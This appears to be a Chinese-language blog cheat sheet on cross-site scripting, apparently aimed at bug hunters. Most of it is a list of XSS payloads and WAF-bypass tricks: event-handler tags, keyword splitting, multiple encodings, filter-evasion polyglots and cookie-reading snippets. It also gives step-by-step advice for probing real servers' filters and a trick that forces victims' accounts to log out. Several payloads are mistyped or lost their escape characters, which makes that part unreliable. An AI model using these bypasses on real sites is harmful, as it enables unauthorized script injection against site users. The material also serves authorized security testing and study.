前言

你碰到WAF是不是都绕不过去？

你是不是只会使用别人的绕过语句？

你是不是只要别人的绕过语句给拦了就束手无措了？

XSS漏洞常见标签

这些标签不用刻意去记，当需要用到的时候直接翻笔记即可，经常用到的话大脑会形成肌肉记忆，不断的去用自然会在脑海慢慢留下记忆 无过滤情况

<sciript>

<script>alert(1);</sciript>

<img>

图片加载错误时触发<img src="x" onerror=alert(1)><img src="1" onerror=eval("alert('xss')")>鼠标指针移动到元素时触发<img src=1 onmouseover="alert(1)">鼠标指针移出时触发<img src=1 onmouseout="alert(1")>

<a>

<a href="http://www.qq.com">qq</a><a href=javascript:alert('1')>test</a><a href=j"avascript:a" onmouseover="alert(/xss/)">aa</a><a href="" onclick=eval(alert('xss'))>aa</a><a href=kycg.asp?ttt=1000 onmouseover=prompt('xss') y=2016>aa</a>

<input>

<input onfocus="alert('xss');">竞争焦点，从而触发onblur事件<input onblur=alert("xss") autofocus><input autofocus>通过autofocus属性执行本身的focus事件，这个变量是使焦点自动跳转到输入元素上,触发焦点事件，无需用户去触发<input onfocus="alert('xss');" autofocus><input value="" onclick=alert('xss') type="text"><input name="name" value="" onmouseover=prompt('xss') bad=""><input name="name" value=""><script>alert('xss')</script>按下按键时触发<input type="text" onkeydown="alert(1)">按下按键时触发<input type="text" onkeypress="alert(1)">松开按键式时触发<input type="text" onkeyup="alert(1)">

<from>

<form action=javascript:alert('xss') method="get"><form action=javasript:laert('xss')><form action=1 onmouseover=alert('xss)>

iframe

<iframe onload=alert("xss");></iframe><iframe src=javascript:alert('xss')></iframe><iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe><iframe src="data:text/html;base64,<script>alert('xss')</script>"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><iframe src="aaa" onmouseover=alert('xss') /><iframe>

<svg>

<svg onload=alert(1)>

<body>

<body onload="alert(1)">利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发<body onscroll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<button>

元素上点击鼠标时触发<button onclick="alert(1)">text</button>

<p>

元素上按下鼠标时触发<p onmousedown="alert(1)">text</p>元素上释放鼠标时触发<p onmouseup="alert(1)">text</p>

<details>

<details ontoggle="alert('xss');">使用open属性触发ontoggle事件，无需用户去触发<details open ontoggle="alert('xss');">

<select>

<select onfocus=alert(1)></select>通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发<select onfocus=alert(1) autofocus>

<video>

<video><source onerror="alert(1)">

<audio>

<audio src=x onerror=alert("xss");>

<textarea>

<textarea onfocus=alert("xss"); autofocus>

<keygen>

<keygen autofocus onfocus=alert(1)> //仅限火狐

javascript伪协议

<a>标签<a href="javascript:alert('xss');">xss</a><iframe>标签<iframe src=javascript:alert('xss');></iframe><img>标签<img src=javascript:alert('xss')>//IE7以下<form>标签<form action="Javascript:alert(1)"><input type=submit>

WAF绕过思路

过滤空格

用 / 代替空格<img/src="x"/onerror=alert("xss");>

过滤关键字

大小写绕过

<ImG sRc=x onerRor=alert("xss");>

双写关键字

(有些waf可能会只替换一次且是替换为空，这种情况下我们可以考虑双写关键字绕过，这要根据实战情况下进行改写)

<imimgg srsrcc=x onerror=alert("xss");>

1、字符拼接

比如过滤的是alert(利用eval，不仅仅在img标签中其他标签照样适用可以不断进行改写)

<img src="x" onerror="a=aler;b=t;c='(xss);';eval(a+b+c)">

2、字符拼接

(利用top，不仅仅在script标签中其他标签照样适用可以不断进行改写)

<script>top["al"+"ert"](``xss``);</script>(只有两个``这里是为了凸显出有`符号)

其它字符混淆

有的waf可能是用正则表达式去检测是否有xss攻击，如果我们能fuzz出正则的规则，则我们就可以使用其它字符去混淆我们注入的代码了下面举几个简单的例子可利用注释`<<script>alert("xss");//<</script><scri<!--test-->pt>alert("hello world!")</scri<!--test-->pt>`标签的优先级`<title><img src=</title>><img src=x onerror="alert(``xss``);">` 因为title标签的优先级比img的高，所以会先闭合title，从而导致前面的img标签无效`<SCRIPT>var a="\";alert("xss");//";</SCRIPT>`

编码绕过

Unicode编码绕过<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;"><img src="x" onerror="eval('u0061u006cu0065u0072u0074u0028u0022u0078u0073u0073u0022u0029u003b')">url编码绕过<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>Ascii码绕过<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">Hex绕过<img src=x onerror=eval('x61x6cx65x72x74x28x27x78x73x73x27x29')>八进制绕过<img src=x onerror=alert('170163163')>base64绕过<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

过滤括号

当括号被过滤的时候可以使用throw来绕过<svg/onload="window.onerror=eval;throw'=alertx281x29';">

过滤url地址

使用url编码<img src="x" onerror=document.location=``http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/``>使用IP<img src="x" onerror=document.location=``http://2130706433/``>十进制<img src="x" onerror=document.location=``http://0177.0.0.01/``>八进制<img src="x" onerror=document.location=``http://0x7f.0x0.0x0.0x1/``>十六进制<img src="x" onerror=document.location=``//www.baidu.com``>html标签中用//可以代替http://使用 (注意：在windows下本身就有特殊用途，是一个path 的写法，所以在Windows下是file协议，在linux下才会是当前域的协议)使用中文逗号代替英文逗号<img src="x" onerror="document.location=``http://www。baidu。com``">//会自动跳转到百度

注意如果有的src直接插入的话，可以使用<img src="x" onerror=console.log(alert(document.cookie));>来测试

限制 ” 符号，输入<img src=1 onclick=alert(‘1’)>限制 ‘ 符号，输入<img src=1 onclick=alert(/1/)>、<img src=1 onclick=”alert(1)”>限制 () 符号，输入<img src=1 onclick=”alert `’1’`”>限制 () ‘ ” 符号，输入<img src=1 onclick=alert `1`>

alert绕过

 (alert)(1)a=alert,a(1)[1].find(alert)top[/al/.source+/ert/.source](1)alu0065rt(1)top[‘al145rt’](1)top[8680439..toString(30)](1)

一些绕过语句

<sVG/x=">"/oNloaD=confirm()///*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e

<lol/onauxclick=[0].some(alert)>rightclick

<svg onx=() onload=(confirm)(1)>

<xssBypass/onpointermove=(confirm)(1)>MoveMouseHere

<svg onx=() onload=(confirm)(1)>

实战中的绕过思路

在实战中每个服务器过滤拦截的参数不同，而真正掌握绕过并不是说利用别人的payload，因为别人的payload很可能在你挖掘漏洞的时候不管用！你要根据实战情况自己去编写绕过语句！不要一看到利用上面的绕过语句绕不过去就放弃了！可以明确告诉你，基本都需要自己来绕过，而且绝大多数xss漏洞都需要进行绕过。XSS绕过中最重要的就是XSS语句的跟踪，我们得跟踪我们输入的语句，然后根据服务器的拦截情况不断的去试。一定要多去跟踪，多去尝试！这样你绕过能力就会慢慢提升。1、先输入标签看哪些标签会给栏，不要一开始输入整个上面的payload，看哪些标签不给拦，一般第一开始先输入<img>，找到了不会拦截的标签就好办，然后对照上面绕过的思路进行改写语句，如果不会给拦截的标签绕不过去的话就果断选择下一个。输入标签的时候如果整个标签会给拦，那就先输入一小部分，如<select>标签会给拦截，那就先输入<se、<sele、<select这样一步一步的进行输入来看到底是怎么给拦截方式，弄懂基本的拦截思路就会比较容易绕过。

2、后面就继续添加，比如会拦截onerror事件，那就先输入one，看还不会给栏，一步一步添加到整个onerror，那就根据上面的绕过思路来实现绕法。

3、有的确实是绕不过去，就不要绕了，我遇到很多绕不过去的，只有img标签可以，但是也可以交一交，就是img标签后的链接更改为退出账号的链接，这样只要对方访问你的评论查看你的内容就自动账号退出，危害还是可以的。

dvwa靶场的作用

除了刚开始初学者用来理解xss漏洞，更重要的是用来我们平常漏洞的挖掘，就是比如你在WAF绕过的时候，你写了一大串的WAF绕过语句，然后在实战中却没有弹窗成功，此时你需要做的就是将你写的这个WAF绕过语句在靶场中进行测试，如果靶场都不能弹窗成功，那么你就要思考是不是自己的语句写错了。自己在写绕过语句的时候可以先去靶场测试。

edusrc邀请码 | 玄机邀请码

    免费不限量提供edusrc邀请码及玄机邀请码，可在的菜单栏资源获取-edusrc邀请码 | 玄机邀请码中获取。